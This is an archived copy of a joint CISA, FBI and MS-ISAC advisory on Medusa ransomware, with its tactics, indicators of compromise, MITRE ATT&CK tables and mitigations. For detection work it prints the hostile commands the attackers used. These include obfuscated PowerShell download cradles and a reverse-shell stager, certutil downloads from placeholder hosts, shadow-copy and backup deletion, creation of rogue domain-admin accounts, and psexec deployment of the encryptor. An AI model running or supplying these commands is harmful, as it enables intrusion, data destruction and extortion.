{
	"id": "f99eda88-967f-4073-9a5d-71299cf994fb",
	"created_at": "2026-04-06T00:10:06.077501Z",
	"updated_at": "2026-04-10T03:21:25.765321Z",
	"deleted_at": null,
	"sha1_hash": "4cba649b032a613ba5d37cfa0e2b84f9d9f7e121",
	"title": "#StopRansomware: Medusa Ransomware | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 192041,
	"plain_text": "#StopRansomware: Medusa Ransomware | CISA\r\nPublished: 2025-03-12 · Archived: 2026-04-05 14:24:39 UTC\r\n1. Mitigate known vulnerabilities by ensuring operating systems, software, and firmware are patched and up\r\nto date within a risk-informed span of time.\r\n2. Segment networks to restrict lateral movement from initial infected devices and other devices in the same\r\norganization.\r\n3. Filter network traffic by preventing unknown or untrusted origins from accessing remote services on\r\ninternal systems.\r\n \r\nSummary\r\nNote: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for\r\nnetwork defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware\r\nadvisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of\r\ncompromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all\r\n#StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.\r\nThe Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the\r\nMulti-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate\r\nknown Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025. \r\nMedusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa\r\ndevelopers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with\r\naffected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa\r\nransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the\r\nFBI’s investigation.\r\nFBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section\r\nof this advisory to reduce the likelihood and impact of Medusa ransomware incidents.\r\nDownload the PDF version of this report:\r\nFor a downloadable list of IOCs, see:\r\nTechnical Details\r\nNote: This advisory uses the MITRE ATT\u0026CK® Matrix for Enterprise framework, version 16. See the MITRE\r\nATT\u0026CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to\r\nMITRE ATT\u0026CK tactics and techniques.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 1 of 14\n\nBackground\r\nThe RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally\r\noperated as a closed ransomware variant, meaning all development and associated operations were controlled by\r\nthe same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important\r\noperations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers\r\nand affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they\r\nencrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.\r\nInitial Access\r\nMedusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to\r\nobtain initial access [TA0001 ] to potential victims. Potential payments between $100 USD and $1 million USD\r\nare offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are\r\nknown to make use of common techniques, such as:\r\nPhishing campaigns as a primary method for stealing victim credentials [T1566 ].\r\nExploitation of unpatched software vulnerabilities [T1190 ] through Common Vulnerabilities and\r\nExposures (CVEs) such as the ScreenConnect vulnerability CVE-2024-1709 [CWE-288: Authentication\r\nBypass Using an Alternate Path or Channel ] and Fortinet EMS SQL injection vulnerability [CVE-2023-\r\n48788 [CWE 89: SQL Injection ].\r\nDiscovery\r\nMedusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network\r\nScanner for initial user, system, and network enumeration. Once a foothold in a victim network is established,\r\ncommonly scanned ports include:\r\n21 (FTP)\r\n22 (SSH)\r\n23 (Telnet)\r\n80 (HTTP)\r\n115 (SFTP)\r\n443 (HTTPS)\r\n1433 (SQL database)\r\n3050 (Firebird database)\r\n3128 (HTTP web proxy)\r\n3306 (MySQL database)\r\n3389 (RDP)\r\nMedusa actors primarily use PowerShell [T1059.001 ] and the Windows Command Prompt (cmd.exe)\r\n[T1059.003 ] for network [T1046 ] and filesystem enumeration [T1083 ] and to utilize Ingress Tool Transfer\r\ncapabilities [T1105 ]. Medusa actors use Windows Management Instrumentation (WMI) [T1047 ] for querying\r\nsystem information.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 2 of 14\n\nDefense Evasion\r\nMedusa actors use LOTL to avoid detection [TA0005 ]. (See Appendix A for associated shell commands\r\nobserved during FBI investigations of Medusa victims.) Certutil ( certutil.exe ) is used to avoid detection when\r\nperforming file ingress.\r\nActors have been observed using several different PowerShell detection evasion techniques with increasing\r\ncomplexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the\r\nPowerShell command line history [T1070.003 ].\r\nIn this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command\r\n[T1027.013 ] using specific execution settings.\r\npowershell -exec bypass -enc \u003cbase64 encrypted command string\u003e\r\nIn another example, the DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable\r\n[T1027 ].\r\npowershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object\r\nNet.WebClient).$x.Invoke(http://\u003cip\u003e/\u003cRAS tool\u003e.msi)\r\nIn the final example, the payload is an obfuscated base64 string read into memory, decompressed from  gzip , and\r\nused to create a  scriptblock . The base64 payload is split using empty strings and concatenation, and uses a\r\nformat operator ( -f ) followed by three arguments to specify character replacements in the base64 payload.\r\npowershell -nop -w hidden -noni -ep bypass \u0026([scriptblock]::create((\r\nNew-Object System.IO.StreamReader(\r\nNew-Object System.IO.Compression.GzipStream((\r\nNew-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(\r\n(('\u003cbase64 payload string\u003e')-f'\u003ccharacter replacement 0\u003e','\u003ccharacter replacement 1\u003e',\r\n'\u003ccharacter replacement 2\u003e')))),\r\n[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))\r\nThe obfuscated base64 PowerShell payload is identical to powerfun.ps1 , a publicly available stager script that\r\ncan create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a\r\nconnection on local port 443 [T1071.001 ], and initiates a connection to a remote port 443 in the reverse\r\nshell.\r\nIn some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection\r\nand response (EDR) tools [T1562.001 ].\r\nFBI has observed Medusa actors using the following tools to support command and control (C2) and evade\r\ndetection:\r\nLigolo.\r\nA reverse tunneling tool often used to create secure connections between a compromised host and\r\nthreat actor’s machine.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 3 of 14\n\nCloudflared.\r\nFormerly known as ArgoTunnel.\r\nUsed to securely expose applications, services, or servers to the internet via Cloudflare Tunnel\r\nwithout exposing them directly.\r\nLateral Movement and Execution\r\nMedusa actors use a variety of legitimate remote access software [T1219 ]; they may tailor their choice based on\r\nany remote access tools already present in the victim environment as a means of evading detection. Investigations\r\nidentified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ\r\nDeploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote\r\nDesktop Protocol (RDP) [T1021.001 ] and PsExec [T1569.002 ]—to move laterally [TA0008 ] through the\r\nnetwork and identify files for exfiltration [TA0010 ] and encryption [T1486 ]. When provided with valid\r\nusername and password credentials, Medusa actors use PsExec to:\r\nCopy ( -c ) one script from various batch scripts on the current machine to the remote machine and\r\nexecute it with SYSTEM level privileges ( -s ).\r\nExecute an already existing local file on a remote machine with SYSTEM level privileges.\r\nExecute remote shell commands using cmd /c .\r\nOne of the batch scripts executed by PsExec is openrdp.bat , which first creates a new firewall rule to allow\r\ninbound TCP traffic on port 3389 :\r\nnetsh advfirewall firewall add rule name=\"rdp\" dir=in protocol=tcp localport=3389\r\naction=allow\r\nThen, a rule to allow remote WMI connections is created:\r\nnetsh advfirewall firewall set rule group=\"windows management instrumentation (wmi)\" new\r\nenable=yes\r\nFinally, the registry is modified to allow Remote Desktop connections:\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t\r\nREG_DWORD /d 0 /f\r\nMimikatz has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping\r\n[T1003.001 ] to harvest credentials [TA0006 ] and aid lateral movement.\r\nExfiltration and Encryption\r\nMedusa actors install and use Rclone to facilitate exfiltration of data to the Medusa C2 servers [T1567.002 ]\r\nused by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [T1072 ] to deploy the\r\nencryptor, gaze.exe , on files across the network—with the actors disabling Windows Defender and other\r\nantivirus services on specific targets. Encrypted files have a .medusa file extension. The process gaze.exe\r\nterminates all services [T1489 ] related to backups, security, databases, communication, file sharing and\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 4 of 14\n\nwebsites, then deletes shadow copies [T1490 ] and encrypts files with AES-256 before dropping the ransom\r\nnote. The actors then manually turn off [T1529 ] and encrypt virtual machines and delete their previously\r\ninstalled tools [T1070 ].\r\nExtortion\r\nMedusa RaaS employs a double extortion model, where victims must pay [T1657 ] to decrypt files and prevent\r\nfurther release. The ransom note demands victims make contact within 48 hours via either a Tor browser based\r\nlive chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the\r\nransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a  .onion data\r\nleak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on\r\nthe site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently\r\nadvertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay\r\n$10,000 USD in cryptocurrency to add a day to the countdown timer.\r\nFBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor\r\nwho claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made\r\nagain to provide the “true decryptor”— potentially indicating a triple extortion scheme.\r\nIndicators of Compromise\r\nTable 1 lists the hashes of malicious files obtained during investigations.\r\nTable 1: Malicious Files\r\nFiles Hash (MD5) Description\r\n!!!READ_ME_MEDUSA!!!.txt Redacted Ransom note file\r\nopenrdp.bat 44370f5c977e415981febf7dbb87a85c\r\nAllows incoming RDP and\r\nremote WMI connections\r\npu.exe 80d852cd199ac923205b61658a9ec5bc Reverse shell\r\nTable 2 includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom\r\nnegotiation and contacting victims following compromise. These email addresses are not associated with phishing\r\nactivity conducted by Medusa actors.\r\nTable 2: Medusa Email Addresses\r\nEmail Addresses Description\r\nkey.medusa.serviceteam@protonmail.com Used for ransom negotiation\r\nmedusa.support@onionmail.org Used for ransom negotiation\r\nmds.svt.breach@protonmail.com Used for ransom negotiation\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 5 of 14\n\nEmail Addresses Description\r\nmds.svt.mir2@protonmail.com Used for ransom negotiation\r\nMedusaSupport@cock.li Used for ransom negotiation\r\nMITRE ATT\u0026CK Tactics and Techniques\r\nSee Table 3 – Table 11 for all referenced threat actor tactics and techniques in this advisory. For assistance with\r\nmapping malicious cyber activity to the MITRE ATT\u0026CK framework, see CISA and MITRE ATT\u0026CK’s Best\r\nPractices for MITRE ATT\u0026CK Mapping and CISA’s Decider Tool .\r\nTable 3: Initial Access\r\nTechnique Title ID Use\r\nExploit Public-Facing\r\nApplication\r\nT1190\r\nMedusa actors exploited unpatched software or n-day vulnerabilities\r\nthrough common vulnerabilities and exposures.\r\nInitial Access\r\nTA0001 Medusa actors recruited initial access brokers (IABS) in\r\ncybercriminal forums and marketplaces to obtain initial access.\r\nPhishing T1566\r\nMedusa IABS used phishing campaigns as a primary method for\r\ndelivering ransomware to victims.\r\nTable 4: Defense Evasion\r\nTechnique Title ID Use\r\nIndicator Removal: Clear Command\r\nHistory\r\nT1070.003 Medusa actors attempt to cover their tracks by\r\ndeleting the PowerShell command line history.\r\nObfuscated Files or Information:\r\nEncrypted/Encoded File\r\nT1027.013 Medusa actors use a well-known evasion technique\r\nthat executes a base64 encrypted command.\r\nObfuscated Files or Information T1027\r\nMedusa actors obfuscated a string by slicing it into\r\npieces and referencing it via a variable.\r\nIndicator Removal T1070\r\nMedusa actors deleted their previous work and tools\r\ninstalled. \r\nImpair Defenses: Disable or Modify\r\nTools\r\nT1562.001 Medusa actors killed or deleted endpoint detection\r\nand response tools.\r\nTable 5: Discovery\r\nTechnique Title ID Use\r\nNetwork Service Discovery T1046\r\nMedusa actors utilized living of the land techniques to\r\nperform network enumeration.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 6 of 14\n\nTechnique Title ID Use\r\nFile and Directory Discovery T1083\r\nMedusa actors utilized Windows Command Prompt for\r\nfilesystem enumeration.\r\nNetwork Share Discovery T1135\r\nMedusa actors queried shared drives on the local system to\r\ngather sources of information.\r\nSystem Network Configuration\r\nDiscovery\r\nT1016\r\nMedusa actors used operating system administrative\r\nutilities to gather network information.\r\nSystem Information Discovery T1082\r\nMedusa actors used the command  systeminfo to gather\r\ndetailed system information.\r\nPermission Groups Discovery:\r\nDomain Groups\r\nT1069.002 Medusa actors attempt to find domain-level group and\r\npermission settings.\r\nTable 6: Credential Access\r\nTechnique Title ID Use\r\nCredential Access TA0006\r\nMedusa actors harvest credentials with tools like Mimikatz to gain\r\naccess to systems.\r\nOS Credential\r\nDumping: LSASS\r\nMemory\r\nT1003.001\r\nMedusa actors were observed accessing credential material stored\r\nin process memory or Local Security Authority Subsystem Service\r\n(LSASS) using Mimkatz.\r\nTable 7: Lateral Movement and Execution\r\nTechnique Title ID Use\r\nLateral Movement TA0008\r\nMedusa actors performed techniques to move laterally\r\nwithout detection once they gained initial access.\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nT1059.001\r\nMedusa actors used PowerShell, a powerful interactive\r\ncommand-line interface and scripting environment for\r\ningress, network, and filesystem enumeration.\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nT1059.003\r\nMedusa actors used Windows Command Prompt—which\r\ncan be used to control almost any aspect of a system—for\r\ningress, network, and filesystem enumeration. \r\nSoftware Deployment Tools T1072\r\nMedusa Actors used PDQ Deploy and BigFix to deploy the\r\nencryptor on files across the network.\r\nRemote Services: Remote\r\nDesktop Protocol\r\nT1021.001\r\nMedusa actors used Remote Desktop Protocol (RDP), a\r\ncommon feature in operating systems, to log into an\r\ninteractive session with a system and move laterally.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 7 of 14\n\nTechnique Title ID Use\r\nSystem Services\r\nT1569.002 Medusa actors used Sysinternals PsExec to deploy the\r\nencryptor on files across the network.\r\nWindows Management\r\nInstrumentation\r\nT1047\r\nMedusa actors abused Windows Management\r\nInstrumentation to query system information.\r\nTable 8: Exfiltration and Encryption\r\nTechnique Title  ID Use\r\nExfiltration TA0010\r\nMedusa actors identified files to exfiltrate out of\r\nvictim networks.\r\nExfiltration Over Web Service:\r\nExfiltration to Cloud Storage\r\nT1567.002 Medusa actors used Rclone to facilitate exfiltration\r\nof data to the Medusa C2 servers.\r\nTable 9: Command and Control\r\nTechnique Title ID Use\r\nIngress Tool Transfer T1105\r\nMedusa actors used PowerShell, Windows Command Prompt, and\r\ncertutil for file ingress.\r\nApplication Layer\r\nProtocol: Web\r\nProtocols \r\nT1071.001\r\nMedusa actors communicate using application layer protocols\r\nassociated with web traffic. In this case, Medusa actors used scripts\r\nthat created reverse or bind shells over port 443 : HTTPS.\r\nRemote Access\r\nSoftware\r\nT1219\r\nMedusa actors used remote access software to move laterally through\r\nthe network.\r\nTable 10: Persistence\r\nTechnique\r\nTitle\r\nID Use\r\nCreate Account\r\nT1136.002 Medusa actors created a domain account to maintain access to victim\r\nsystems.\r\nTable 11: Impact\r\nTechnique Title ID Use\r\nData Encrypted for\r\nImpact\r\nT1486 Medusa identified and encrypted data on target systems to interrupt\r\navailability to system and network resources.\r\nInhibit System\r\nRecovery\r\nT1490 The process  gaze.exe terminates all services then deletes shadow\r\ncopies and encrypts files with AES-256 before dropping the ransom note.\r\nFinancial Theft\r\nT1657 Victims must pay to decrypt files and prevent further release by Medusa\r\nactors.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 8 of 14\n\nTechnique Title ID Use\r\nSystem\r\nShutdown/Reboot\r\nT1529\r\nMedusa actors manually turned off and encrypted virtual machines.\r\nService Stop\r\nT1489 The process  gaze.exe terminates all services related to backups,\r\nsecurity, databases, communication, file sharing, and websites,\r\nMitigations\r\nFBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve cybersecurity\r\nposture based on threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance\r\nGoals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs\r\nprovide a minimum set of practices and protections that CISA and NIST recommend all organizations implement.\r\nCISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most\r\ncommon and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more\r\ninformation on the CPGs, including additional recommended baseline protections.\r\nImplement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and\r\nservers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud)\r\n[CPG 2.F, 2.R, 2.S].\r\nRequire all accounts with password logins (e.g., service accounts, admin accounts, and domain admin\r\naccounts) to comply with NIST’s standards. In particular, require employees to use long passwords and\r\nconsider not requiring frequently recurring password changes, as these can weaken security [CPG 2.C].\r\nRequire multifactor authentication for all services to the extent possible, particularly for webmail,\r\nvirtual private networks, and accounts that access critical systems [CPG 2.H].\r\nKeep all operating systems, software, and firmware up to date. Timely patching is one of the most\r\nefficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\r\nPrioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].\r\nSegment networks to prevent the spread of ransomware. Network segmentation can help prevent the\r\nspread of ransomware by controlling traffic flows between—and access to—various subnetworks and by\r\nrestricting adversary lateral movement [CPG 2.F].\r\nIdentify, detect, and investigate abnormal activity and potential traversal of the indicated\r\nransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool\r\nthat logs and reports all network traffic, including lateral movement activity on a network. Endpoint\r\ndetection and response (EDR) tools are particularly useful for detecting lateral connections as they have\r\ninsight into common and uncommon network connections for each host [CPG 3.A].\r\nRequire VPNs or Jump Hosts for remote access.\r\nMonitor for unauthorized scanning and access attempts.\r\nFilter network traffic by preventing unknown or untrusted origins from accessing remote services on\r\ninternal systems. This prevents threat actors from directly connecting to remote access services that they\r\nhave established for persistence.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 9 of 14\n\nAudit user accounts with administrative privileges and configure access controls according to the\r\nprinciple of least privilege [CPG 2.E].\r\nReview domain controllers, servers, workstations, and active directories for new and/or unrecognized\r\naccounts [CPG 1.A, 2.O].\r\nDisable command-line and scripting activities and permissions. Privilege escalation and lateral\r\nmovement often depend on software utilities running from the command line. If threat actors are not able\r\nto run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E, 2.N].\r\nDisable unused ports[CPG 2.V].\r\nMaintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By\r\ninstituting this practice, the organization helps ensure they will not be severely interrupted and/or only have\r\nirretrievable data.\r\nEnsure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire\r\norganization’s data infrastructure [CPG 2.K, 2.L, 2.R].\r\nValidate Security Controls\r\nIn addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating\r\nyour organization’s security program against the threat behaviors mapped to the MITRE ATT\u0026CK Matrix for\r\nEnterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security\r\ncontrols inventory to assess how they perform against the ATT\u0026CK techniques described in this advisory.\r\nTo get started:\r\n1. Select an ATT\u0026CK technique described in this advisory (Table 3 to Table 11).\r\n2. Align your security technologies against the technique.\r\n3. Test your technologies against the technique.\r\n4. Analyze your detection and prevention technologies’ performance.\r\n5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\r\n6. Tune your security program, including people, processes, and technologies, based on the data generated by\r\nthis process.\r\nThe FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production\r\nenvironment to ensure optimal performance against the MITRE ATT\u0026CK techniques identified in this advisory.\r\nResources\r\nJoint #StopRansomware Guide.\r\nJoint Guide Identifying and Mitigating Living Off the Land Techniques.\r\nJoint Guide to Securing Remote Access Software.\r\nReporting\r\nYour organization has no obligation to respond or provide information back to FBI in response to this joint\r\nadvisory. If, after reviewing the information provided, your organization decides to provide information to FBI,\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 10 of 14\n\nreporting must be consistent with applicable state and federal laws.\r\nFBI is interested in any information that can be shared, to include boundary logs showing communication to and\r\nfrom foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information,\r\ndecryptor files, and/or a benign sample of an encrypted file.\r\nAdditional details of interest include a targeted company point of contact, status and scope of infection, estimated\r\nloss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and\r\nnetwork-based indicators.\r\nThe FBI, CISA, and MS-ISAC do not encourage paying ransoms as payment does not guarantee victim files will\r\nbe recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage\r\nother criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of\r\nwhether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to\r\npromptly report ransomware incidents to FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office,\r\nor CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov ) or by\r\ncalling 1-844-Say-CISA (1-844-729-2472).\r\nDisclaimer\r\nThe information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or\r\nservices linked within this document. Any reference to specific commercial entities, products, processes, or\r\nservices by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement,\r\nrecommendation, or favoring by the FBI, CISA, and MS-ISAC.\r\nAcknowledgements\r\nConnectWise contributed to this advisory.\r\nVersion History\r\nMarch 12, 2025: Initial version.\r\nAppendix A: Medusa Commands\r\nThese commands explicitly demonstrate the methods used by Medusa threat actors once they obtain a foothold\r\ninside a victim network. Incident responders and threat hunters can use this information to detect malicious\r\nactivity. System administrators can use this information to design allowlist/denylist policies or other protective\r\nmechanisms.\r\ncmd.exe /c certutil -f urlcache https://\u003cdomain\u003e/\u003cremotefile\u003e.css \u003clocalfile\u003e.dll\r\ncmd.exe /c certutil -f urlcache https://\u003cdomain\u003e/\u003cremotefile\u003e.msi \u003clocalfile\u003e.msi\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 11 of 14\n\ncmd.exe /c driverquery\r\ncmd.exe /c echo Computer: %COMPUTERNAME% \u0026 `\r\necho Username: %USERNAME% \u0026 `\r\necho Domain: %USERDOMAIN% \u0026 `\r\necho Logon Server: %LOGONSERVER% \u0026 `\r\necho DNS Domain: %USERDNSDOMAIN% \u0026 `\r\necho User Profile: %USERPROFILE% \u0026 echo `\r\nSystem Root: %SYSTEMROOT%\r\ncmd.exe /c ipconfig /all [T1016 ]\r\ncmd.exe /c net share [T1135 ]\r\ncmd.exe /c net use\r\ncmd.exe /c netstat -a\r\ncmd.exe /c sc query\r\ncmd.exe /c schtasks\r\ncmd.exe /c systeminfo [T1082 ]\r\ncmd.exe /c ver\r\ncmd.exe /c wmic printer get caption,name,deviceid,drivername,portname\r\ncmd.exe /c wmic printjob\r\nmmc.exe compmgmt.msc /computer:{hostname/ip}\r\nmstsc.exe /v:{hostname/ip}\r\nmstsc.exe /v:{hostname/ip} /u:{user} /p:{pass}\r\npowershell -exec bypass -enc \u003cbase64 encrypted command string\u003e\r\npowershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object\r\nNet.WebClient).$x.Invoke(http://\u003cip\u003e/\u003cRMM tool\u003e.msi)\r\npowershell -nop -w hidden -noni -ep bypass \u0026([scriptblock]::create((\r\nNew-Object System.IO.StreamReader(\r\nNew-Object System.IO.Compression.GzipStream((\r\nNew-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(\r\n(('\u003cbase64 payload string\u003e')-f'\u003ccharacter replacement 0\u003e',\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 12 of 14\n\n'\u003ccharacter replacement 1\u003e','\u003ccharacter replacement 2\u003e')))),\r\n[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))\r\npowershell Remove-Item (Get-PSReadlineOption).HistorySavePath\r\npowershell Get-ADComputer -Filter * -Property * | Select-Object\r\nName,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate,\r\nlogonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path \u003cfile path\u003e \r\n-NoTypeInformation -Encoding UTF8\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} \"c:\\windows\\system32\\taskkill.exe\" /f /im WRSA.exe\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -c coba.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -c openrdp.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -c StopAllProcess.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -c zam.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} c:\\temp\\x.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} cmd\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} cmd /c   \"c:\\gaze.exe\"\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} cmd /c  \"copy \\\\ad02\\sysvol\\gaze.exe c:\\gaze.exe\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} cmd /c  \"copy \\\\ad02\\sysvol\\gaze.exe c:\\gaze.exe \u0026\u0026\r\nc:\\gaze.exe\"\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -u {user} -p {pass} -c coba.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -u {user} -p {pass} -c openrdp.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -u {user} -p {pass} -c zam.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -u {user} -p {pass} cmd\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -u {user} -p {pass} -с newuser.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -с duooff.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -с hostname/ipwho.bat\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 13 of 14\n\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -с newuser.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -с removesophos.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -с start.bat\r\npsexec.exe -accepteula -nobanner -s \\\\{hostname/ip} -с uninstallSophos.bat\r\nnltest /dclist:\r\nnet group \"domain admins\" /domain [T1069.002 ]\r\nnet group \"Domain Admins\" default /add /domain\r\nnet group \"Enterprise Admins\" default /add /domain\r\nnet group \"Remote Desktop Users\" default /add /domain\r\nnet group \"Group Policy Creator Owners\" default /add /domain\r\nnet group \"Schema Admins\" default /add /domain\r\nnet group \"domain users\" /domain\r\nnet user default /active:yes /domain\r\nnet user /add default \u003cpassword\u003e /domain [T1136.002 ]\r\nquery user\r\nreg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0\r\nsysteminfo\r\nvssadmin.exe Delete Shadows /all /quiet\r\nvssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded\r\ndel /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.* %s*.set %s*.win\r\n%s*.dsk\r\nnetsh advfirewall firewall add rule name=\"rdp\" dir=in protocol=tcp localport=3389 action=allow\r\nnetsh advfirewall firewall set rule group=\"windows management instrumentation (wmi)\" new enable=yes\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t\r\nREG_DWORD /d 0 /f\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a"
	],
	"report_names": [
		"aa25-071a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434206,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4cba649b032a613ba5d37cfa0e2b84f9d9f7e121.pdf",
		"text": "https://archive.orkl.eu/4cba649b032a613ba5d37cfa0e2b84f9d9f7e121.txt",
